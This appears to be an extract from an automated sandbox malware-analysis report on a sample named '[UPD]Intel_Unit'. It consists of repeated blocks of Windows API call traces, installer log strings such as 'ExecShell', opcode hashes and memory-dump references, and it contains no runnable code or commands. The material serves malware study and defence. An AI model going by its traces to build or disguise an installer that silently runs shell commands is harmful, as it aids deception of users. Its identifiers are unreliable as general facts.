                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                              • API String ID: 2266616436-4211696005
                                                                                                                                                                                                              • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                              • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                              • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                              • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                              • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                              • API String ID: 3156913733-2180253247
                                                                                                                                                                                                              • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                              • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                                                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountFileNameTempTick
                                                                                                                                                                                                              • String ID: nsa
                                                                                                                                                                                                              • API String ID: 1716503409-2209301699
                                                                                                                                                                                                              • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                              • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                              • String ID: HideWindow
                                                                                                                                                                                                              • API String ID: 1249568736-780306582
                                                                                                                                                                                                              • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                              • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                              • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                              • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                              • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                              • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                              • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                              • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                                                                                                                              • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                              • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                              • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2260018040.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_[UPD]Intel_Unit.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                                                              • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                              • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2258505896.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258484932.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258527944.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2258547832.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
